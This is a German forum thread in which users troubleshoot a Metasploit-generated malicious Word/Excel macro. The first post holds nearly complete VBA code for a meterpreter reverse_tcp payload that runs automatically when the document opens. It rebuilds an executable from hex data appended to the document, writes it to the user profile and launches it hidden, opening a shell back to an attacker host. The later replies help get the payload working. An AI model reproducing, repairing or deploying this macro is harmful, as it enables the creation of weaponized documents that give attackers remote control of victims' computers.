Results 1 to 6 of 6

Thread: msfpayload VBA Code Fehler Help

  1. #1
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    8

    Default msfpayload VBA Code Fehler Help

    Hallo,

    hab mich mal mit der Macro Geschichte etwas beschäftigt und komme nicht so recht weiter. Die example.bas bekomme ich erstellt und Importiert in Word oder Excel. Nun bekomme ich beim Öffnen der Worddatei (Autostart macro) jedes mal ein Fehler,

    Fehler beim Kompilieren: benutzerdefinierter Typ nicht definiert!

    Problem liegt dabei wohl in der Zeile "Dim Wcddi4 As Paragraph"



    hat jemand ein Tipp dazu?

    anbei noch der komplette VBA Code (Inklusive gekürzter Liste für den Anhang Dokument:

    Code:
    'Created by msfpayload 
    'Payload: windows/meterpreter/reverse_tcp
    ' Length: 290
    'Options: LHOST=192.168.1.224,LPORT=80
    
    '**************************************************************
    '*
    '* This code is now split into two pieces:
    '*  1. The Macro. This must be copied into the Office document
    '*     macro editor. This macro will run on startup.
    '*
    '*  2. The Data. The hex dump at the end of this output must be
    '*     appended to the end of the document contents.
    '*
    '**************************************************************
    '*
    '* MACRO CODE
    '*
    '**************************************************************
    Sub Auto_Open()
    	Wcddi12
    End Sub
    Sub Wcddi12()
    	Dim Wcddi7 As Integer
    	Dim Wcddi1 As String
    	Dim Wcddi2 As String
    	Dim Wcddi3 As Integer
    	Dim Wcddi4 As Paragraph
    	Dim Wcddi8 As Integer
    	Dim Wcddi9 As Boolean
    	Dim Wcddi5 As Integer
    	Dim Wcddi11 As String
    	Dim Wcddi6 As Byte
    	Dim Tjupuewrfe as String
    	Tjupuewrfe = "Tjupuewrfe"
    	Wcddi1 = "fkijvwSWLhnJeVj.exe"
    	Wcddi2 = Environ("USERPROFILE")
    	ChDrive (Wcddi2)
    	ChDir (Wcddi2)
    	Wcddi3 = FreeFile()
    	Open Wcddi1 For Binary As Wcddi3
    	For Each Wcddi4 in ActiveDocument.Paragraphs
    		DoEvents
    			Wcddi11 = Wcddi4.Range.Text
    		If (Wcddi9 = True) Then
    			Wcddi8 = 1
    			While (Wcddi8 < Len(Wcddi11))
    				Wcddi6 = Mid(Wcddi11,Wcddi8,4)
    				Put #Wcddi3, , Wcddi6
    				Wcddi8 = Wcddi8 + 4
    			Wend
    		ElseIf (InStr(1,Wcddi11,Tjupuewrfe) > 0 And Len(Wcddi11) > 0) Then
    			Wcddi9 = True
    		End If
    	Next
    	Close #Wcddi3
    	Wcddi13(Wcddi1)
    End Sub
    Sub Wcddi13(Wcddi10 As String)
    	Dim Wcddi7 As Integer
    	Dim Wcddi2 As String
    	Wcddi2 = Environ("USERPROFILE")
    	ChDrive (Wcddi2)
    	ChDir (Wcddi2)
    	Wcddi7 = Shell(Wcddi10, vbHide)
    End Sub
    Sub AutoOpen()
    	Auto_Open
    End Sub
    Sub Workbook_Open()
    	Auto_Open
    End Sub
    '**************************************************************
    '*
    '* PAYLOAD DATA
    '*
    '**************************************************************
    
    
    Tjupuewrfe
    &H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H################  Rest gelöscht

    gr. SHI

  2. #2
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Default

    Hab selbst noch nicht mit den Makros gearbeitet, aber als erstes ist mir in den Sinn gekommen, dass es evtl nich an demExploit sondern an deinem Word liegt.
    Welche Office Version und welches ServicePack hast du denn?

  3. #3
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    8

    Default

    hab schon in Office 2000, 2003 und 2007 probiert, alles gleich.

    Komisch dabei, wenn ich Metasploit original BT4 ohne irgendwelche Updates nehme, gehts, der Code sieht auch komplett anders aus. Wenn ich netframework3/ Metasploit komplett update gehts nicht mehr...das habe ich jetzt noch rausgefundennn

  4. #4
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Default

    Im Englischen Bereich dieses Forums wird beschrieben das es momentan probleme gibt wenn man Metasploit updatet.
    Man soll sich am besten per SVN die neuste Version holen und nicht über das Updatescript...
    Oder so ähnlich, habs nicht mehr im Kopf!
    Ich glaub bei Announce oder so im Englischen Teil steht was dazu...
    musste mal nach suchen!

  5. #5
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    8

    Default

    das mit den Updates war ein guter Tipp, hab nochmal alles per Hand ge-updatet
    und siehe da, es geht!


    Danke!

  6. #6
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    4

    Default Re: msfpayload VBA Code Fehler Help

    Hallo zusammen!

    Sorry fürs Rauskramen dieses alten Threads, aber ich habe genau das Problem ebenfalls und finde einfach keinen Weg, es zu lösen. Ich habe auch schon einen Thread auf Englisch hier eröffnet.

    Ist das Update-Problem denn noch immer aktuell? Mit keiner Officeversion funktioniert bei mir das Einfügen des Payloads. Ich habe auch schon per SVN einen separaten Metasploit-Snapshot runtergeladen, aber der Fehler bleibt genau so bestehen... Es macht also keinen Unterschied, ob ich diese oder die Version, die mit BT4 final kommt, benutze. Wie genau hast du denn das Problem gelöst? Kannst du mir bitte ein paar Details nennen? Das wäre wirklich super! Denn ich beginne schon langsam, an mir selbst zu zweifeln...

    Danke!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •